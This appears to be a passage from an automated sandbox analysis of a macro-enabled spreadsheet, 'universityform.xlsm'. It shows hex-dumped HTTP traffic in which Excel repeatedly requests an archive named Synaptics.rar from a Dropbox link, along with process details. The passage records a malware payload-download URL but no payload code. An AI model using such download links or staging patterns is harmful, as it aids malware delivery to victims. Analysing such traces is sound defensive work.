                              2024-12-30 10:12:14 UTC1390INData Raw: 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 48 51 7a 78 5f 33 43 73 34 32 45 36 4d 78 66 6f 2d 74 7a 41 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 3b 7d 2a
                              Data Ascii: tle><style nonce="7HQzx_3Cs42E6Mxfo-tzAA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}*
                              2024-12-30 10:12:14 UTC102INData Raw: 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                              Data Ascii: ror.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                              2024-12-30 10:12:14 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              4192.168.2.449862162.125.66.184437392C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                              TimestampBytes transferredDirectionData
                              2024-12-30 10:12:14 UTC178OUTGET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1
                              Connection: Keep-Alive
                              Accept: */*
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                              Host: www.dropbox.com
                              2024-12-30 10:12:15 UTC825INHTTP/1.1 409 Conflict
                              Content-Security-Policy: script-src 'none'
                              Content-Security-Policy: sandbox
                              Pragma: no-cache
                              Referrer-Policy: strict-origin-when-cross-origin
                              Set-Cookie: gvc=MjYyMTU0NTA0NDY1MDIwMjQ0MzgzOTU5MDE4MTU1Njg3MDQ2MTc5; Path=/; Expires=Sat, 29 Dec 2029 10:12:14 GMT; HttpOnly; Secure; SameSite=None
                              X-Content-Type-Options: nosniff
                              X-Permitted-Cross-Domain-Policies: none
                              X-Robots-Tag: noindex, nofollow, noimageindex
                              X-Xss-Protection: 1; mode=block
                              Content-Type: text/html; charset=utf-8
                              Content-Length: 1121
                              Date: Mon, 30 Dec 2024 10:12:14 GMT
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Server: envoy
                              Cache-Control: no-cache, no-store
                              Vary: Accept-Encoding
                              X-Dropbox-Response-Origin: far_remote
                              X-Dropbox-Request-Id: 0367924c13044610ba7b53524e392f98
                              Connection: close
                              2024-12-30 10:12:15 UTC1121INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 39 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                              Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 409</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              5192.168.2.449869162.125.66.184437392C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                              TimestampBytes transferredDirectionData
                              2024-12-30 10:12:15 UTC178OUTGET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1
                              Connection: Keep-Alive
                              Accept: */*
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                              Host: www.dropbox.com
                              2024-12-30 10:12:16 UTC825INHTTP/1.1 409 Conflict
                              Content-Security-Policy: script-src 'none'
                              Content-Security-Policy: sandbox
                              Pragma: no-cache
                              Referrer-Policy: strict-origin-when-cross-origin
                              Set-Cookie: gvc=Mjk0MDA5OTc4MzM1Nzk5MTg1NzMwNzEzNzY2OTc4MTIxMTgxODg1; Path=/; Expires=Sat, 29 Dec 2029 10:12:16 GMT; HttpOnly; Secure; SameSite=None
                              X-Content-Type-Options: nosniff
                              X-Permitted-Cross-Domain-Policies: none
                              X-Robots-Tag: noindex, nofollow, noimageindex
                              X-Xss-Protection: 1; mode=block
                              Content-Type: text/html; charset=utf-8
                              Content-Length: 1121
                              Date: Mon, 30 Dec 2024 10:12:16 GMT
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Server: envoy
                              Cache-Control: no-cache, no-store
                              Vary: Accept-Encoding
                              X-Dropbox-Response-Origin: far_remote
                              X-Dropbox-Request-Id: c83e7507775d42e4a41136f3ea3dfec6
                              Connection: close
                              2024-12-30 10:12:16 UTC1121INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 39 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                              Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 409</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                              Click to jump to process

                              Click to jump to process

                              Click to dive into process behavior distribution

                              Click to jump to process

                              Target ID:0
                              Start time:05:10:58
                              Start date:30/12/2024
                              Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                              Imagebase:0xe10000
                              File size:53'161'064 bytes
                              MD5 hash:4A871771235598812032C822E6F68F19
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              Target ID:5
                              Start time:05:12:01
                              Start date:30/12/2024
                              Path:C:\Windows\splwow64.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\splwow64.exe 12288
                              Imagebase:0x7ff730fa0000
                              File size:163'840 bytes
                              MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              Target ID:7
                              Start time:05:12:10
                              Start date:30/12/2024
                              Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\universityform.xlsm"
                              Imagebase:0xe10000
                              File size:53'161'064 bytes
                              MD5 hash:4A871771235598812032C822E6F68F19
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              No disassembly